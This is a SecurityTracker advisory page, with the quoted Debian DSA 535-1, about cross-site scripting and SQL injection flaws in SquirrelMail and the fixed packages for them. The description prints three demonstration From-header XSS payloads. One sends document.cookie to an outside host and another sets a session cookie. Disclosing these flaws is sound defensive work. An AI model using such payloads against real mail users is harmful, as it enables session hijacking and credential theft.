SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   SquirrelMail Vendors:   SquirrelMail Development Team
(Debian Issues Fix) SquirrelMail Input Validation Flaw in From Message Header Line Permits Cross-Site Scripting
SecurityTracker Alert ID:  1010843
SecurityTracker URL:  http://securitytracker.com/id/1010843
CVE Reference:   CVE-2004-0520, CVE-2004-0639   (Links to External Site)
Date:  Aug 3 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 1.4.3; 1.5.1 and prior development versions
Description:   An input validation vulnerability was reported in SquirrelMail. A remote user can conduct cross-site scripting attacks.

Roman Medina reported that a remote user can send a specially crafted e-mail to a target user that, when view by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the SquirrelMail software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

According to the report, certain attachment parameters are not properly filtered.

Some demonstration exploit "From" header line examples are provided:

From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><>

From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>

From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx; path=/';</script><>

The vendor was reportedly notified on May 22, 2004.

The original advisory is available at:

http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SquirrelMail software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   Debian has released a fix for the current stable distribution (woody) in version 1:1.2.6-1.4 and for the unstable distribution (sid) in 2:1.4.3a-0.1 and earlier versions.

Debian GNU/Linux 3.0 alias woody:

Source archives:

http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.4.dsc
Size/MD5 checksum: 586 9e3f6fb2b152cb6086be738abc5e1021
http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.4.diff.gz
Size/MD5 checksum: 20493 0f07dc4c32a8356344ba5f39d6c2373a
http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6.orig.tar.gz
Size/MD5 checksum: 1856087 be9e6be1de8d3dd818185d596b41a7f1

Architecture independent components:

http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.4_all.deb
Size/MD5 checksum: 1840376 34057494a43f7a136276d821956e010a

Vendor URL:  www.squirrelmail.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Debian)
Underlying OS Comments:  3.0

Message History:   This archive entry is a follow-up to the message listed below.
May 30 2004 SquirrelMail Input Validation Flaw in From Message Header Line Permits Cross-Site Scripting



 Source Message Contents

Subject:  [SECURITY] [DSA 535-1] New squirrelmail packages fix multiple vulnerabilities


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 535-1                     security@debian.org
http://www.debian.org/security/                             Matt Zimmerman
August 2nd, 2004                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : squirrelmail
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2004-0519 CAN-2004-0520 CAN-2004-0521 CAN-2004-0639

Four vulnerabilities were discovered in squirrelmail:

 CAN-2004-0519 - Multiple cross-site scripting (XSS) vulnerabilities
 in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary
 script as other users and possibly steal authentication information
 via multiple attack vectors, including the mailbox parameter in
 compose.php.

 CAN-2004-0520 - Cross-site scripting (XSS) vulnerability in mime.php
 for SquirrelMail before 1.4.3 allows remote attackers to insert
 arbitrary HTML and script via the content-type mail header, as
 demonstrated using read_body.php.

 CAN-2004-0521 - SQL injection vulnerability in SquirrelMail before
 1.4.3 RC1 allows remote attackers to execute unauthorized SQL
 statements, with unknown impact, probably via abook_database.php.

 CAN-2004-0639 - Multiple cross-site scripting (XSS) vulnerabilities
 in Squirrelmail 1.2.10 and earlier allow remote attackers to inject
 arbitrary HTML or script via (1) the $mailer variable in
 read_body.php, (2) the $senderNames_part variable in
 mailbox_display.php, and possibly other vectors including (3) the
 $event_title variable or (4) the $event_text variable.

For the current stable distribution (woody), these problems have been
fixed in version 1:1.2.6-1.4.

For the unstable distribution (sid), these problems have been fixed in
2:1.4.3a-0.1 and earlier versions.

We recommend that you update your squirrelmail package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.4.dsc
      Size/MD5 checksum:      586 9e3f6fb2b152cb6086be738abc5e1021
    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.4.diff.gz
      Size/MD5 checksum:    20493 0f07dc4c32a8356344ba5f39d6c2373a
    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6.orig.tar.gz
      Size/MD5 checksum:  1856087 be9e6be1de8d3dd818185d596b41a7f1

  Architecture independent components:

    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.4_all.deb
      Size/MD5 checksum:  1840376 34057494a43f7a136276d821956e010a

  These files will probably be moved into the stable distribution on
  its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBDvbvArxCt0PiXR4RAh4RAJoCBt8RRN4j6YIIt0VRGiHYz+MRUgCg2CUK
DkXTAoNoIZTecvEywEbbw/E=
=RnQg
-----END PGP SIGNATURE-----


-- 
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC